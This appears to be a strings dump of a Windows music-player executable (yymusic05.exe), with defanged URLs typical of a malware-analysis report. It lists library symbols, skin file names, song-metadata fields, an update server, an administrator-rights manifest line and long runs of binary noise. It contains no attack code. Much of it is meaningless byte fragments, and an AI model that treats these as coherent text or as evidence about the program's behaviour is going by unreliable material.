parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@

.?AV?$sp_counted_impl_p@U?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V12@U?$less@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@_WV?$allocator@_W@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@@detail@boost@@

%Program Files%\yyfm0529\2014081705\yymusic05.exe

fiTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:AF7207EBFCA7E211A4BAB609526B9429" xmpMM:DocumentID="xmp.did:0CCE7CECA7FD11E292E997ACCC5A275E" xmpMM:InstanceID="xmp.iid:0CCE7CEBA7FD11E292E997ACCC5A275E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AF7207EBFCA7E211A4BAB609526B9429" stRef:documentID="xmp.did:AF7207EBFCA7E211A4BAB609526B9429"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

#%DSZ

k/.ea"#>Nn

W%u3>C

f9Ky.RW`

125x125.jpg

L.Xkj

320x225.png

astop.png}W

back.png

bg2.png}SOh

bg3.png

bg_2.png}S]H

bk.png|

I[CsS%SC

.qO9M

t%7UfEa

zC%f

]#%Sj

J%XDU@}T

8i.aV;

%fiHZZ9

3Nv%F

R%cV}V

mD%SK'l9

QC

bkcolor_1.png

bkcolor_2.png

bkcolor_3.png

bkcolor_4.png

bkcolor_5.png

bkcolor_6.png

bkcolor_7.png

border.png

L9q

btn-anonymity.png}

[).XF

'q.CAqK

btn-delete.png

btn-fav.png}Wy8

btn-login.png}

btn-login2.png

[%*,\4>66

%S;&DN

btn-next.png

btn-pause.png}X

btn-play.png

BtnHidePlayList.png

BtnRightTop.png

btn_9k.png}Wy8

btn_bd.png}Xy8

btn_close.png}Vy8

btn_comm.png

btn_db.png}W

btn_fh.png}XwT

btn_kw.png}

btn_ok.png}W

l[O{#. %x

btn_ok_blue.png

btn_ok_red.png}

btn_sc.png

=%uIS

btn_xm.png}X

button.png

channel.png

close.png

collection.png

ðxEuJxg

color_list_bk.png

\dl

dash.png}SM

DefaultUserImage.jpg

%S]wF

downd.png

downda.png

downdahover.png

DownLoadProgressForeImage.png

exit.png}U

fbcaptionbk.png

feedback.png}V

>/.Yhi

font_bkcolor.png

font_forecolor.png

forecolor_1.png

forecolor_2.png

forecolor_3.png

forecolor_4.png

.IDATx

forecolor_5.png

forecolor_6.png

forecolor_7.png

forgettt.jpg

frmdownmenu.xml

FrmDropDownMenuFrame.xml

FrmFeedBack.xmle

FrmHotKeyTip.xmlu

frmlogin.xml

FrmLrcChild.xmlU

FrmMenuFrame.xml

frmplayer.xml

frmplaylist.xml

frmProgressToolTip.xmlUPKN

frmWebBrowser.xml=

frmWindowLrc.xml%M1

frmWindowLrcParent.xml%

headimg.png}

d%U(.6

tG%C*

history.png

home.png}VgTS

hotkeytipbk.png

icon.png

input-password.png}U

input-user.png

like.png

!\Un%x

list.png

lista.png

D-wjÓ

listahover.png

list_item_bg.png}S

list_pause.png

list_play.png

list_scroll_bar.png}SmH

list_scroll_bar2.png}S_H

{òC

list_title_bg.png}S

loading01.png

loading02.png

loading03.png

loading04.png

LoginBk.png

%S%hu.Y

g).IQ

LrcBk.png

u-3H}.

lrclist.png}Xy8

@.xn?

lyricdelete.png

lyricdeletea.png

lyricdeletea2.png

LyricFrameVoice.png

lyricmute.png

lyrictoplay.png

mainframeshadow.png

3.jUj

max.png

menu.png

min.png}SOh

mine.png

minea.png

mineahover.png

mini.png

mE)iVA.nP

more.png}SOH

musiclibrary.png

next.png}ViTSg

next0520.png

normalVolume.png}U

%DZRlj

play0520.png

play2.png

playerbg01.png

playerbg02.png

playerlist.png}X

playersidebg.jpg

playinging.jpg

playinginga.jpg

".Wlm

playingnext.png

playingplaying.jpg

playingprev.jpg

playingpreva.jpg

playingrandom.jpg

playingrandoma.jpg

playingvoice.png}V

PlayProgressForeImage.png

pl_back.png}S_h

pl_bg.png

pl_big.png

pl_btn_down.png}Tih

pl_btn_on.png

pl_close.png}S[H

pl_color.png

pl_desktop.png

pl_feedback.png}SKL

pl_forward.png}S_H

pl_icon.png}Wy8

pl_itself.png

pl_mutevol.png

pl_next.png}S_h

pl_pause.png}SKh

pl_prev.png

pl_res.png

pl_set.png

pl_small.png}Tmh

pl_split.png}S_h

pl_vol.png

pop_bkimage.png}U

power.png}XgTS

,&.,&#/!./*

prev.png}ViTS

prev0520.png

prevention.png

progresstooltip.png

progresstooltipbk.png

.ZfDrhe

T%s61K

m;.rA

progress_fore.png

pushedVolume.png

random.jpg

random01.jpg

random01a.jpg

random01hover.jpg

random02.jpg

random02a.jpg

random02hover.jpg

random03.jpg

random03a.jpg

random03hover.jpg

random0520.png

reflash.png

remembertt.jpg

scrollbar.png

search.png

E.Eg/&

SelectColor_SliderBar_Thumb.png

5).uZ

slider_bg.png

sound (2).jpg

sound.jpg

sound100.jpg

steup.png}

suspensionbig.png

suspensionbiga.png

suspensionbigahover.png

suspensionclose.png

suspensionclosea.png

suspensioncloseahover.png

suspensionfeedback.png

suspensionfeedbacka.png

suspensionfeedbackahover.png

suspensionlogin.png

suspensionmin.png

suspensionmina.png

suspensionminahover.png

suspensionset.png

suspensionseta.png

suspensionsetahover.png

suspensiontop.png

suspensiontopa.png

suspensiontopahover.png

system_menu_btnexit.png

system_menu_btnfeedback.png}V

system_menu_btnmin.png

;7%2uf

system_menu_btnmini.png

system_menu_btnsteup.png}

system_menu_btntop.png}W

sys_check_btn.png

sys_check_btn_blue.png

sys_check_btn_red.png

sys_check_btn_whiter.png

tab_comm.png

tooltipbk.png

update.xml

voice00528.png

voice0520.png

voice0a0528.png

voice1000528.png

voiceall0528.png

astop.png

bg2.png

bg_2.png

bk.png

btn-anonymity.png

btn-fav.png

btn-login.png

btn-pause.png

btn_9k.png

btn_bd.png

btn_close.png

btn_db.png

btn_fh.png

btn_kw.png

btn_ok.png

btn_ok_red.png

btn_xm.png

dash.png

exit.png

feedback.png

frmProgressToolTip.xml

frmWebBrowser.xml

headimg.png

home.png

input-password.png

list_item_bg.png

list_scroll_bar.png

list_scroll_bar2.png

list_title_bg.png

lrclist.png

min.png

more.png

next.png

normalVolume.png

playerlist.png

playingvoice.png

pl_back.png

pl_btn_down.png

pl_close.png

pl_feedback.png

pl_forward.png

pl_icon.png

pl_next.png

pl_small.png

pl_split.png

pop_bkimage.png

power.png

prev.png

steup.png

system_menu_btnfeedback.png

system_menu_btnsteup.png

system_menu_btntop.png

.Zuxf

tCPS

$;y)#%s

.QsvC

.VvC v

lH)Qk%c

4n.Ei

,GA.GS

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>

6 6$6(6,6

7(7.787?7

> >'>.>5><>]>

0%0U0

5$5(5,5054585

3M4

? ?$?(?,?0?4?8?<?

7-7R7}7

> >$>(>,>0>4>8><>

4 4$4(4,4044484<4

6 6$6(6,60646

8 8$8(8,80848

3 3$3(3,3034383<3@3

? ?$?(?,?0?4?8?<?@?

3 3$3(3,3034383<3

: :@:`:|:

=$=,=4=<=\=

4 5$5(545

mscoree.dll

LKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

Skin\bkcolor_1.png

Skin\forecolor_1.png

Skin\bkcolor_2.png

Skin\forecolor_2.png

Skin\bkcolor_3.png

Skin\forecolor_3.png

Skin\bkcolor_4.png

Skin\forecolor_4.png

Skin\bkcolor_5.png

Skin\forecolor_5.png

Skin\bkcolor_6.png

Skin\forecolor_6.png

Skin\bkcolor_7.png

Skin\forecolor_7.png

E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/rapidxml.hpp

E:\zhuyicheng\boost_1_53_0\boost/optional/optional.hpp

!p.empty() && "Empty path not allowed for put_child."

errorUrl

E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml.hpp

E:\zhuyicheng\svn\trunk\MusicPlayerSrc\win32\MusicPlayer\Header Files\rapidxml/rapidxml_print.hpp

E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/shared_ptr.hpp

E:\zhuyicheng\boost_1_53_0\boost/smart_ptr/scoped_ptr.hpp

E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/impl/match.ipp

val.is_initialized()

E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/core/match.hpp

c.stack.size() >= 1

Song.music_id

Song.artid

Song.name

Song.artist

Song.special

Song.artist_pic240

Song.mp3path

Song.mp3dl

hXXp://

=data.xcode

data.songList

E:\zhuyicheng\boost_1_53_0\boost/spirit/home/classic/utility/impl/chset/range_run.ipp

r.is_valid()

tplayList.trackList

Assertion failed: %s, file %s, line %d

1.14.529.1

MusicPla.exe

YFMSever.exe_2388:

.idata

.rdata

`.rsrc

kernel32.dll

Windows

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

ssShift

htKeyword

EInvalidOperation

u%CNu

%s[%d]

%s_%d

EInvalidGraphicOperation

Uh.FB

USER32.DLL

comctl32.dll

uxtheme.dll

OnKeyDown

OnKeyPress

OnKeyUp

UrlMon

Proportional

%s%s%s%s%s%s%s%s%s%s

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

TKeyEvent

TKeyPressEvent

HelpKeywordteA

crSQLWait

%s (%s)

imm32.dll

AutoHotkeys

AutoHotkeys8~D

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowState

tagMSG

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

User32.dll

%s, ClassID: %s

ole32.dll

olepro32.dll

getservbyport

WSAAsyncGetServByPort

WSAJoinLeaf

WS2_32.DLL

127.0.0.1

Uh.AF

TIdSocketListWindows

TIdStackWindowsU

IdStackWindows

%s, %.2d %s %.4d %s %s

%s, %d %s %d %s %s

ftpTransfer

ftpReady

ftpAborted

ClientPortMin<

ClientPortMax

Port

EIdCanNotBindPortInRange

EIdInvalidPortRangeSVW

saUsernamePassword

Password<

0.0.0.1

TIdTCPConnection

TIdTCPConnection0

IdTCPConnection

EIdTCPConnectionError

TIdTCPClient

IdTCPClient

BoundPort

PortU

password

Password

IdHTTPHeaderInfo

ProxyPassword<

ProxyPort

Mozilla/3.0 (compatible; Indy Library)

libeay32.dll

ssleay32.dll

SSL_CTX_use_PrivateKey_file

SSL_CTX_use_certificate_file

SSL_get_peer_certificate

SSL_CTX_set_default_passwd_cb

SSL_CTX_set_default_passwd_cb_userdata

SSL_CTX_check_private_key

X509_STORE_CTX_get_current_cert

des_set_key

sslvrfFailIfNoPeerCert

TPasswordEvent

Certificate

RootCertFile,}@

CertFile,}@

KeyFile

OnGetPasswordTGG

EIdOSSLLoadingRootCertError

EIdOSSLLoadingCertError

EIdOSSLLoadingKeyError

CommentURL

TIdHTTPMethod

IdHTTP

TIdHTTPOption

TIdHTTPOptions

TIdHTTPProtocolVersion

IdHTTPx

TIdHTTPOnHeadersAvailable

TIdHTTPOnRedirectEvent

TIdHTTPResponse

TIdHTTPRequest

TIdHTTPRequestd

TIdHTTPProtocolx

TIdCustomHTTP

TIdCustomHTTPx

TIdHTTP`

TIdHTTP

HTTPOptionst

EIdHTTPProtocolException

HTTPS

https

This request method is supported in HTTP 1.1

HTTP/1.0 200 OK

HTTP/

grfKeyState

TComTargetExecEvent

CmdGroup

nCmdID

nCmdexecopt

hhctrl.ocx

URLMON.DLL

SHDOCLC.DLL

IWebBrowser

IWebBrowserApph

IWebBrowser2

TEWBWindowSetResizable

TEWBWindowSetLeft

TEWBWindowSetTop

TEWBWindowSetWidth

TEWBWindowSetHeight

bstrUrlContext

bstrUrl

OnWindowSetResizable

OnWindowSetLeft

OnWindowSetTopT

OnWindowSetWidth

OnWindowSetHeight

rcmDefault

rcmDebug

DontExecuteScripts

DontExecuteJava

DontExecuteActiveX

DisableUrlIfEncodingUTF8

EnableUrlIfEncodingUTF8

CheckFontSupportsCodePage

DisableSubmitUrlInUTF8

EnableSubmitUrlInUTF8

lpMsg

PMsg

pguidCmdGroup

TTranslateUrlEvent

pchURLIn

ppchURLOut

CmdID

pszUrl

pszUrlContext

szPassWord

ErrorUrl

OptionKeyPath

OverrideOptionKeyPath`

OnTranslateUrl

OnCommandExec

'%s' is not supported.

WebocPopupManagement

ValidateNavigateUrl

HttpUsernamePasswordDisable

GetUrlDomFilePathUnencoded

XmlHttp

MAPI32.DLL

PTF://

hXXp://

hXXps://

AppEvents\Schemes\Apps\Explorer\Navigating\.Current

.Current

\ieframe.dll

\shdocvw.dll

\StringFileInfo\%0.4x%0.4x\%s

TMsgEvent

TKeyEventEx

Bypass

poPortrait

OnKeyDown<

0.750000

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(

EmbeddedWB hXXp://bsalsa.com/

TFileOperation

FileOperation

OnActionExecute

SysConfig.ini

WJHTTP

%d.%d

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

0123456789

DSound.dll

Winmm.dll

Data\User2.ini

88888888

Update.zip

00000000

YYMusic05.exe

DMSet.Xml

/DM11/DMSet.Xml

hXXp://VVV.baidu.com

hXXp://update.yinyue.fm

8888-88-88

PlayerUpdate.exe

0000-00-00

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

[(*&^%$#@!)]

?456789:;<=

!"#$%&'()* ,-./0123

Nv.QbD

{Z|.qktg

)sVk.eU

?:4.al\u

ac.Rp

U%U,f

ù%"

6QZ.kkE!^\

.Cee,Wm

AKLRUXZZjjjjjjjjmjjZZXURLK"

%S_dikkggggk

%Uagkk`F9?nA>H^

333333333333333333

33333833

3333333333333338

:*"*"$3338

33333333

33333333333

3333333333338

33338?383

333333333333

:*3:"$3338

333333333333333

@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(

@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(

=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'

=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'

<3&<3&<3&<3&<3&<3&<3&<3&<3&<3&

<3&<3&<3&<3&

<3&<3&<3&<3&<3&<3&<3&<3&<3&

@4(@4(@4(@4(@4(@4(=4'=4'=4'=4'=4'

=4'=4'=4'=4'=4'<3&<3&<3&<3&

[email protected]

N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.N?/M>.PA1

NA1PA.OA/

OA.SB-O@0OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2SC3RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2RB1SC2RB1RB1QA0RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2TD3TD3TD3TD3TD3TD3TD3TD3TD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3UC2UC2UC2UC2UC2TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3WF3WF3WF3WF3WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5XI6XI6VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4YH5YH5XG4XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]J5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^L5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^I3^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3_K2`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3aM4aM4aM4aM4aM4aM4aM4aM4cM4cM4cM4cM4cM4

zoaI>0K=1M=0M>.kbX

RH>J=/J=/J=/J=/K>0J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L=-L=-L=-L=-L>,L>,L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/[email protected]@[email protected]@[email protected]@[email protected]/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2TE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XG4WF3WF3YE3XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1[F1]F0]F0

g]SF9 E8*E8*E8*E8*F9 E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,E:,E:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:*H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; 